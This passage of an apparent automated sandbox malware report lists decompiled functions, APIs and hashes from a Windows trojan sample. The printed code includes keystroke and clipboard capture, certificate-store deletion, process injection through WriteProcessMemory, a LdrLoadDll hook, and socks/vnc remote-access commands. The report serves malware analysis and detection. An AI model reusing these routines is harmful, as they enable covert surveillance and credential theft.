Instruction Fuzzy Hash: 22517C30A7124AAAFB11DB6CD854BFE77F8AF56700F088159DB01AB2C0DB748E09DB51

Uniqueness

Uniqueness Score: -1.00%

Function 012CA8EB Relevance: 7.6, APIs: 5, Instructions: 70
clipboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012CA8EB(signed int __edx, void* _a4) {
				void* _t11;
				void* _t12;
				void* _t17;
				void* _t21;
				signed int _t26;
				void* _t29;
				void* _t30;
				int _t31;

				_t26 = __edx;
				_t31 = _a4;
				_t29 = GetClipboardData(_t31);
				_a4 = _t29;
				if(L012B150A() == 0) {
					return _t29;
				}
				if(_t29 == 0 || _t31 != 1 && _t31 != 0xd && _t31 != 7) {
					L20:
					return _a4;
				} else {
					_t21 = GlobalLock(_t29);
					if(_t21 == 0) {
						L19:
						goto L20;
					}
					_t11 = _t31 - 1;
					if(_t11 == 0) {
						_t12 = L012B1596(_t21, _t26 | 0xffffffff);
						L12:
						_t30 = _t12;
						L15:
						if(_t30 != 0) {
							EnterCriticalSection(0x12dd810);
							E012CA78B(0x12d8d88);
							E012CA78B(_t30);
							LeaveCriticalSection(0x12dd810);
							if(_t30 != _t21) {
								L012B1933(_t30);
							}
						}
						GlobalUnlock(_a4);
						goto L19;
					}
					_t17 = _t11 - 6;
					if(_t17 == 0) {
						_t12 = L012B13A2(_t21, _t26 | 0xffffffff);
						goto L12;
					}
					if(_t17 != 6) {
						_t30 = _a4;
					} else {
						_t30 = _t21;
					}
					goto L15;
				}
			}

0x012ca8eb
0x012ca8ef
0x012ca8fa
0x012ca8fc
0x012ca906
0x00000000
0x012ca908
0x012ca911
0x012ca9a0
0x00000000
0x012ca926
0x012ca92e
0x012ca932
0x012ca99f
0x00000000
0x012ca99f
0x012ca936
0x012ca937
0x012ca95a
0x012ca951
0x012ca951
0x012ca964
0x012ca966
0x012ca96e
0x012ca979
0x012ca97f
0x012ca985
0x012ca98d
0x012ca991
0x012ca991
0x012ca98d
0x012ca999
0x00000000
0x012ca999
0x012ca939
0x012ca93c
0x012ca94c
0x00000000
0x012ca94c
0x012ca941
0x012ca961
0x012ca943
0x012ca943
0x012ca943
0x00000000
0x012ca941

APIs

GetClipboardData.USER32 ref: 012CA8F4
GlobalLock.KERNEL32 ref: 012CA928
EnterCriticalSection.KERNEL32(012DD810), ref: 012CA96E
LeaveCriticalSection.KERNEL32(012DD810,00000000,012D8D88), ref: 012CA985
GlobalUnlock.KERNEL32(?), ref: 012CA999

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: CriticalGlobalSection$ClipboardDataEnterLeaveLockUnlock
String ID:
API String ID: 1509472541-0
Opcode ID: 092c1b6ecd418cb3f0503cf3ca08cb2ddf54e7159a9baf1d085aa3f3b473eeb4
Instruction ID: 9f3ca934574d234751bf999fff2c9defbf87174365a9f0691ea258c07f58828a
Opcode Fuzzy Hash: 092c1b6ecd418cb3f0503cf3ca08cb2ddf54e7159a9baf1d085aa3f3b473eeb4
Instruction Fuzzy Hash: 9A11EB3A93010F675B222A7DE9CA5FD3B55AEC5E6031B432DFB1B97144FE7089058351

Uniqueness

Uniqueness Score: -1.00%

Function 012BD399 Relevance: 7.6, APIs: 5, Instructions: 56
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012BD399(WCHAR* __ecx, void* __eflags) {
				short _v524;
				struct _WIN32_FIND_DATAW _v1116;
				WCHAR* _t35;
				void* _t37;

				_t35 = __ecx;
				if(L012B1203( &_v524, __ecx, "*") == 0) {
					L10:
					SetFileAttributesW(_t35, 0x80);
					return RemoveDirectoryW(_t35) & 0xffffff00 | _t15 != 0x00000000;
				}
				_t37 = FindFirstFileW( &_v524,  &_v1116);
				if(_t37 == 0xffffffff) {
					L9:
					goto L10;
				} else {
					goto L2;
				}
				do {
					L2:
					if(L012B13A7( &(_v1116.cFileName)) == 0 && L012B1203( &_v524, _t35,  &(_v1116.cFileName)) != 0) {
						_t44 = _v1116.dwFileAttributes & 0x00000010;
						if((_v1116.dwFileAttributes & 0x00000010) == 0) {
							L012B1640( &_v524);
						} else {
							L012B196F( &_v524, _t44);
						}
					}
				} while (FindNextFileW(_t37,  &_v1116) != 0);
				FindClose(_t37);
				goto L9;
			}

0x012bd3a3
0x012bd3b9
0x012bd42f
0x012bd435
0x012bd449
0x012bd449
0x012bd3d0
0x012bd3d5
0x012bd42e
0x00000000
0x00000000
0x00000000
0x00000000
0x012bd3d7
0x012bd3d7
0x012bd3e4
0x012bd3fa
0x012bd407
0x012bd410
0x012bd409
0x012bd409
0x012bd409
0x012bd407
0x012bd423
0x012bd428
0x00000000

APIs

FindFirstFileW.KERNEL32(?,?,?,012D7424), ref: 012BD3CA
FindNextFileW.KERNEL32(00000000,?,?,012D7424), ref: 012BD41D
FindClose.KERNEL32(00000000,?,012D7424), ref: 012BD428
SetFileAttributesW.KERNEL32(?,00000080,012D7424), ref: 012BD435
RemoveDirectoryW.KERNEL32(?,?,00000080,012D7424), ref: 012BD43C

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: FileFind$AttributesCloseDirectoryFirstNextRemove
String ID:
API String ID: 937699248-0
Opcode ID: 310ab54116091c5b4781cf04658d6ac1481ceb7f4dfe29968730a4f6fe01d56f
Instruction ID: bf28ba5644ad0dd98bb480966028318ce91e1023ae342395476f4906a9dfcc7c
Opcode Fuzzy Hash: 310ab54116091c5b4781cf04658d6ac1481ceb7f4dfe29968730a4f6fe01d56f
Instruction Fuzzy Hash: 5D11C6719211295BDB20AB68ECCDBFE7B7C9F01384F0501A4EA52A3085EF346A85CB25

Uniqueness

Uniqueness Score: -1.00%

Function 012B395D Relevance: 7.5, APIs: 5, Instructions: 36encryptionCOMMON

Download Yara Rule

APIs

CertOpenSystemStoreW.CRYPT32(00000000,?), ref: 012B3967
CertDuplicateCertificateContext.CRYPT32(00000000), ref: 012B3980
CertDeleteCertificateFromStore.CRYPT32(00000000,?,?,?,?,012B39C3,012D7048), ref: 012B398B
CertEnumCertificatesInStore.CRYPT32(00000000,00000000), ref: 012B3993
CertCloseStore.CRYPT32(00000000,00000000), ref: 012B399F

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: Cert$Store$Certificate$CertificatesCloseContextDeleteDuplicateEnumFromOpenSystem
String ID:
API String ID: 1842529175-0
Opcode ID: 036f5f17c3cc299e1395013d7d334183210c4f1097f4864d6d1e12b1ccf7a2ad
Instruction ID: 44b7b8a8aded4fb9db35a6b8664ea9c4ce1ad540ab87cc82499c872b8795a59e
Opcode Fuzzy Hash: 036f5f17c3cc299e1395013d7d334183210c4f1097f4864d6d1e12b1ccf7a2ad
Instruction Fuzzy Hash: 0BF02032683A116BD2210769FC4CFEBBBACFF82BA1F064501F64686144AB21A800C771

Uniqueness

Uniqueness Score: -1.00%

Function 012CA854 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51
windowCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E012CA854(MSG* _a4) {
				short _v24;
				char _v280;
				signed int _t23;
				MSG* _t27;
				void* _t28;

				_t27 = _a4;
				if(_t27 != 0 && L012B150A() != 0 && _t27->message == 0x100 && _t27->wParam != 0x1b && GetKeyboardState( &_v280) != 0) {
					_t23 = ToUnicode(_t27->wParam, _t27->lParam & 0x000000ff,  &_v280,  &_v24, 9, 0);
					if(_t23 > 0) {
						if(_t23 != 1) {
							if(__eflags > 0) {
								goto L11;
							} else {
								goto L10;
							}
						} else {
							if(_t27->wParam != 8) {
								L10:
								__eflags = _v24 - 0x20;
								if(_v24 >= 0x20) {
									L11:
									__eflags = 0;
									 *((short*)(_t28 + _t23 * 2 - 0x14)) = 0;
									_push( &_v24);
									goto L12;
								}
							} else {
								_push(0x12d8d84);
								L12:
								E012CA78B();
							}
						}
					}
				}
				return TranslateMessage(_t27);
			}

0x012ca85e
0x012ca863
0x012ca8aa
0x012ca8b2
0x012ca8b7
0x012ca8c6
0x00000000
0x00000000
0x00000000
0x00000000
0x012ca8b9
0x012ca8bd
0x012ca8c8
0x012ca8c8
0x012ca8cd
0x012ca8cf
0x012ca8cf
0x012ca8d1
0x012ca8d9
0x00000000
0x012ca8d9
0x012ca8bf
0x012ca8bf
0x012ca8da
0x012ca8da
0x012ca8da
0x012ca8bd
0x012ca8b7
0x012ca8b2
0x012ca8e8

APIs

GetKeyboardState.USER32(?), ref: 012CA884
ToUnicode.USER32 ref: 012CA8AA
TranslateMessage.USER32(?), ref: 012CA8E0

Strings

, xrefs: 012CA8C8

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: KeyboardMessageStateTranslateUnicode
String ID:
API String ID: 3638559909-3916222277
Opcode ID: 3513d7a5ee88c0a966000f215623705a21dbbe6beadc6a0cdb48ee2b7f449d1c
Instruction ID: 7a43c4197e5caa3adc12499d9ca10740ffbd65d36b4d0ed985beb8f39da39dcf
Opcode Fuzzy Hash: 3513d7a5ee88c0a966000f215623705a21dbbe6beadc6a0cdb48ee2b7f449d1c
Instruction Fuzzy Hash: DE01823192161F9BDB309A58D909BEB77A8AF10F01F04822DA706E3044F630DA469766

Uniqueness

Uniqueness Score: -1.00%

Function 012B504C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E012B504C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct HINSTANCE__* _t4;
				_Unknown_base(*)()* _t5;
				void* _t8;
				void* _t11;
				struct HINSTANCE__* _t12;

				_t11 = __edx;
				_t8 = __ecx;
				_t4 = LoadLibraryW(L"shell32.dll");
				_t12 = _t4;
				if(_t12 != 0) {
					_t5 = GetProcAddress(_t12, 0x3d);
					if(_t5 != 0) {
						 *_t5(_t8, 0, _t11, _a4, _a8, _a12);
					}
					return FreeLibrary(_t12);
				}
				return _t4;
			}

0x012b5057
0x012b5059
0x012b505b
0x012b5061
0x012b5065
0x012b506a
0x012b5072
0x012b5081
0x012b5081
0x00000000
0x012b5084
0x012b508e

APIs

LoadLibraryW.KERNEL32(shell32.dll), ref: 012B505B
GetProcAddress.KERNEL32(00000000,0000003D), ref: 012B506A
FreeLibrary.KERNEL32(00000000), ref: 012B5084

Strings

shell32.dll, xrefs: 012B5052

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: shell32.dll
API String ID: 145871493-3366042328
Opcode ID: 44a29963fcdf41512ee53de04ce1494a37be571dc54f72ece307b737cf2a9e88
Instruction ID: 089d9ed0fd0913de06b8481c275cd7ca14ab1daa5ec19559c490dc884c10d360
Opcode Fuzzy Hash: 44a29963fcdf41512ee53de04ce1494a37be571dc54f72ece307b737cf2a9e88
Instruction Fuzzy Hash: E5E09232602215BBD7321A6AFC48FDF7F1CEF89BA1F054915FB0499100CA35C91087A0

Uniqueness

Uniqueness Score: -1.00%

Function 012B30C0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 164
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B30C0(CHAR** _a4) {
				signed int _v8;
				CHAR** _v12;
				char _v276;
				signed short _v280;
				char _v284;
				signed int _v285;
				signed short _v292;
				void* _v300;
				char _v784;
				char _v788;
				CHAR*** _v792;
				signed char _v796;
				signed short _v798;
				char _v800;
				CHAR*** _v804;
				void* _t68;

				L012B1654(_t68);
				_v12 = _a4;
				L012B144C( &_v276);
				_v8 = 0;
				_t144 =  *_v12;
				if(lstrcmpiA( *_v12, ?str?) != 0) {
					if(lstrcmpiA( *_v12, ?str?) != 0) {
						_t144 = 0;
						_v280 = L012B134D( *_v12, 0);
						if(_v280 > 0 && _v280 < 0xffff) {
							_v8 = _v280 & 0x0000ffff;
						}
					} else {
						_v8 = 0xfffffffe;
					}
				} else {
					_v8 = 0xffffffff;
				}
				if(_v8 == 0) {
					L22:
					L012B1343( &_v276, _t144 | 0xffffffff);
					L012B141A( &_v276);
					L012B1933( *_v12);
					L012B1933(_v12[1]);
					L012B1933(_v12[2]);
					L012B1492(_v12[3]);
					L012B1933(_v12);
					return 0;
				}
				_t144 = L012B134D(_v12[2], 0);
				_v284 = L012B13C0(_v12[1], _t87);
				if(_v284 == 0xffffffff) {
					goto L22;
				}
				L012B17B2(_v284, 1);
				L012B1122(_v284, 1, 0x493e0, 0x1388);
				L012B11AE( &_v788);
				_t144 =  &_v300 | 0xffffffff;
				_v285 = L012B169A( &_v784,  &_v300 | 0xffffffff,  &_v300);
				if((_v285 & 0x000000ff) != 0) {
					_t144 = 1;
					_v285 = L012B16A4(_v284, 1, _v300, _v292 & 0x0000ffff);
					L012B138E( &_v300);
				}
				_t94 = _v285 & 0x000000ff;
				if((_v285 & 0x000000ff) == 0) {
					L21:
					L012B1B22(_t94, _v284);
					goto L22;
				} else {
					while(1) {
						_t144 = 1;
						if(L012B10C8( &_v284, 1, 0, 0, 0) != _v284) {
							goto L21;
						}
						_t94 = L012B162C(_v284,  &_v800,  &_v792);
						_t144 = _t94 & 0x000000ff;
						if((_t94 & 0x000000ff) == 0) {
							goto L21;
						}
						if((_v796 & 0x000000ff) == 2 && (_v798 & 0x0000ffff) == 4) {
							_v804 = L012B1C17(0xc);
							if(_v804 != 0) {
								 *_v804 = _v12;
								_v804[1] = _v8;
								_v804[2] =  *_v792;
								if((L012B125D( &_v276, 0x20000, E012B3370, _v804, 0, 0) & 0x000000ff) == 0) {
									L012B1933(_v804);
								}
							}
							L012B1848( &_v276);
						}
						L012B1933(_v792);
					}
					goto L21;
				}
			}

0x012b30cb
0x012b30d3
0x012b30dc
0x012b30e1
0x012b30f0
0x012b30fb
0x012b3119
0x012b3124
0x012b3130
0x012b313d
0x012b3152
0x012b3152
0x012b311b
0x012b311b
0x012b311b
0x012b30fd
0x012b30fd
0x012b30fd
0x012b3159
0x012b3317
0x012b3320
0x012b332b
0x012b3335
0x012b3340
0x012b334b
0x012b3356
0x012b335e
0x012b3368
0x012b3368
0x012b316c
0x012b3179
0x012b3186
0x00000000
0x00000000
0x012b3194
0x012b31ab
0x012b31b6
0x012b31c2
0x012b31d0
0x012b31df
0x012b31f0
0x012b31fd
0x012b3209
0x012b3209
0x012b320e
0x012b3217
0x012b330c
0x012b3312
0x00000000
0x012b321d
0x012b321d
0x012b3223
0x012b3239
0x00000000
0x00000000
0x012b3252
0x012b3257
0x012b325c
0x00000000
0x00000000
0x012b326c
0x012b3288
0x012b3295
0x012b32a0
0x012b32ab
0x012b32bc
0x012b32e4
0x012b32ec
0x012b32ec
0x012b32e4
0x012b32f7
0x012b32f7
0x012b3302
0x012b3302
0x00000000
0x012b321d

APIs

lstrcmpiA.KERNEL32(?,socks), ref: 012B30F3
lstrcmpiA.KERNEL32(?,vnc,?,socks), ref: 012B3111

Strings

vnc, xrefs: 012B3106
socks, xrefs: 012B30E8

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: lstrcmpi
String ID: socks$vnc
API String ID: 1586166983-270151703
Opcode ID: ab359f1529bb2c499cfa9aff0c02f9a1adf340ef0cff117f8b279d900f90b0e2
Instruction ID: 2f83a802553fee87de671d76110df42670eac4b8aa7ea9fc5275e753fb61be24
Opcode Fuzzy Hash: ab359f1529bb2c499cfa9aff0c02f9a1adf340ef0cff117f8b279d900f90b0e2
Instruction Fuzzy Hash: 6A714930A202299BCB29DB24D8E1BEDB7B5BF58340F1481E8D6596B2D1DB309F85CF40

Uniqueness

Uniqueness Score: -1.00%

Function 012B8BB3 Relevance: 6.1, APIs: 4, Instructions: 95
memoryinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E012B8BB3(void* __ecx, void* __edx) {
				char _v5;
				signed int _v12;
				signed int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v28;
				void* _t37;
				intOrPtr _t42;
				intOrPtr* _t43;
				long _t46;
				void* _t47;
				SIZE_T* _t50;
				signed int _t53;
				void* _t59;
				void* _t61;
				intOrPtr _t62;
				void* _t65;
				intOrPtr _t67;
				unsigned int _t69;

				_t65 = __edx;
				_t1 = _t65 + 0x3c; // 0xd0
				_t61 =  *_t1 + __edx;
				_t46 =  *(_t61 + 0x50);
				_v20 = __ecx;
				_v28 = _t46;
				_v5 = 0;
				if(IsBadReadPtr(__edx, _t46) == 0) {
					_t37 = VirtualAllocEx(_v20, 0, _t46, 0x3000, 0x40);
					_v12 = _t37;
					if(_t37 == 0) {
						L17:
						return _v12;
					}
					_t47 = L012B142E(_t65, _t46);
					_t50 = 0;
					if(_t47 == 0) {
						L16:
						VirtualFreeEx(_v20, _v12, 0, 0x8000);
						_v12 = _v12 & 0x00000000;
						goto L17;
					}
					if( *((intOrPtr*)(_t61 + 0xa4)) <= 0) {
						L15:
						L012B1933(_t47);
						if(_v5 != 0) {
							goto L17;
						}
						goto L16;
					}
					_t42 =  *((intOrPtr*)(_t61 + 0xa0));
					if(_t42 <= 0) {
						goto L15;
					}
					_t62 =  *((intOrPtr*)(_t61 + 0x34));
					_t59 = _v12 - _t62;
					_v24 = _t65 - _t62;
					_t43 = _t42 + _t47;
					while( *_t43 != _t50) {
						_t67 =  *((intOrPtr*)(_t43 + 4));
						if(_t67 < 8) {
							L12:
							_t43 = _t43 +  *((intOrPtr*)(_t43 + 4));
							_t50 = 0;
							continue;
						}
						_t69 = _t67 + 0xfffffff8 >> 1;
						_v16 = _t50;
						if(_t69 == 0) {
							goto L12;
						} else {
							goto L9;
						}
						do {
							L9:
							_t53 =  *(_t43 + 8 + _v16 * 2) & 0x0000ffff;
							if(_t53 != 0) {
								 *((intOrPtr*)((_t53 & 0x00000fff) +  *_t43 + _t47)) =  *((intOrPtr*)((_t53 & 0x00000fff) +  *_t43 + _t47)) + _t59 - _v24;
							}
							_v16 = _v16 + 1;
						} while (_v16 < _t69);
						goto L12;
					}
					_v5 = WriteProcessMemory(_v20, _v12, _t47, _v28, _t50) != 0;
					goto L15;
				}
				return 0;
			}

0x012b8bbc
0x012b8bbe
0x012b8bc1
0x012b8bc3
0x012b8bc8
0x012b8bcb
0x012b8bce
0x012b8bda
0x012b8bf0
0x012b8bf6
0x012b8bfb
0x012b8cb4
0x00000000
0x012b8cb4
0x012b8c0a
0x012b8c0c
0x012b8c10
0x012b8c9d
0x012b8caa
0x012b8cb0
0x00000000
0x012b8cb0
0x012b8c1c
0x012b8c90
0x012b8c92
0x012b8c9b
0x00000000
0x00000000
0x00000000
0x012b8c9b
0x012b8c1e
0x012b8c26
0x00000000
0x00000000
0x012b8c28
0x012b8c30
0x012b8c32
0x012b8c35
0x012b8c75
0x012b8c39
0x012b8c3f
0x012b8c70
0x012b8c70
0x012b8c73
0x00000000
0x012b8c73
0x012b8c44
0x012b8c46
0x012b8c49
0x00000000
0x00000000
0x00000000
0x00000000
0x012b8c4b
0x012b8c4b
0x012b8c4e
0x012b8c56
0x012b8c65
0x012b8c65
0x012b8c68
0x012b8c6b
0x00000000
0x012b8c4b
0x012b8c8c
0x00000000
0x012b8c8c
0x00000000

APIs

IsBadReadPtr.KERNEL32(?,?), ref: 012B8BD2
VirtualAllocEx.KERNEL32(?,00000000,?,00003000,00000040,?,?), ref: 012B8BF0
WriteProcessMemory.KERNEL32(?,?,00000000,?,00000000,?,?), ref: 012B8C84
VirtualFreeEx.KERNEL32(?,?,00000000,00008000,?,?), ref: 012B8CAA

Memory Dump Source

Source File: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: Virtual$AllocFreeMemoryProcessReadWrite
String ID:
API String ID: 1273498236-0
Opcode ID: a7fbd5d6cb451a53824e3121c9b601128ef17471c40ee83e36f9cc53bbd8d106
Instruction ID: 676d2d57f034a06ed0e86a94efef02559f02d89065eac37e4ed1269d2806b583
Opcode Fuzzy Hash: a7fbd5d6cb451a53824e3121c9b601128ef17471c40ee83e36f9cc53bbd8d106
Instruction Fuzzy Hash: F731C471E2121AAFDF198FA8CC84BEEBBB9FF44341F194068E605B7290C7709950CB90

Uniqueness

Uniqueness Score: -1.00%

Function 012C2D9E Relevance: 6.1, APIs: 4, Instructions: 53
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E012C2D9E(WCHAR* _a4, long _a8, UNICODE_STRING* _a12, HMODULE* _a16) {
				void* _t12;
				long _t13;
				void* _t16;
				void* _t22;
				UNICODE_STRING* _t23;
				void* _t25;
				HMODULE* _t26;

				if(L012B150A() == 0) {
					goto ( *0x12dc7c0);
				}
				_t26 = _a16;
				_t23 = _a12;
				_t12 =  *0x12dc7c4(_a4, 0, _t23, _t26, _t22, _t25, _t16);
				_t13 = LdrLoadDll(_a4, _a8, _t23, _t26);
				_a4 = _t13;
				if(_t12 < 0 && _t13 >= 0 && _t26 != 0 &&  *_t26 != 0 && _t23 != 0) {
					EnterCriticalSection(0x12dcd98);
					if(( *0x12dcdb0 & 0x00000001) == 0 && L012B1B81( *((intOrPtr*)(_t23 + 4)),  *_t26) != 0) {
						 *0x12dcdb0 =  *0x12dcdb0 | 0x00000001;
					}
					LeaveCriticalSection(0x12dcd98);
				}
				return _a4;
			}

0x012c2da8
0x012c2dab
0x012c2dab
0x012c2db3
0x012c2db7
0x012c2dc1
0x012c2dd1
0x012c2dd7
0x012c2ddc
0x012c2df5
0x012c2e02
0x012c2e12
0x012c2e12
0x012c2e1a
0x012c2e1a
0x012c2e27

APIs

LdrGetDllHandle.NTDLL(?,00000000,?,?), ref: 012C2DC1
LdrLoadDll.NTDLL(?,?,?,?), ref: 012C2DD1
EnterCriticalSection.KERNEL32(012DCD98), ref: 012C2DF5
LeaveCriticalSection.KERNEL32(012DCD98), ref: 012C2E1A

Memory Dump Source

Source File: 00000000.00000002.312172233.00000000012C0000.00000020.00000001.01000000.00000003.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000000.00000002.312163089.00000000012B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312165672.00000000012B1000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312180903.00000000012D7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312184568.00000000012DB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312188785.00000000012DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312191890.00000000012E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.312194439.00000000012E1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_12b0000_dmB3aYi8Bo.jbxd

Similarity

API ID: CriticalSection$EnterHandleLeaveLoad
String ID:
API String ID: 1466281904-0
Opcode ID: 244f66ed0c0629096bf12def6d183dde4e3abd109180614e8489064170d3210d
Instruction ID: fc9e2c11e3c0d74b9f4ac63d8d4faea721de190d7190e4352b2e0e7ac721fc72
Opcode Fuzzy Hash: 244f66ed0c0629096bf12def6d183dde4e3abd109180614e8489064170d3210d
Instruction Fuzzy Hash: 68016D32A11206EBEB229E58FD48BA67F69EF54B55F04011DEF0666245DF31A821CB90

Uniqueness

Uniqueness Score: -1.00%

Function 012B6A4C Relevance: 6.0, APIs: 4, Instructions: 38networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(?,00000001,00000006), ref: 012B6A5B
bind.WS2_32(00000000,?,-0000001D), ref: 012B6A7B
listen.WS2_32(00000000), ref: 012B6A87
closesocket.WS2_32(00000000), ref: 012B6A92

Memory Dump Source

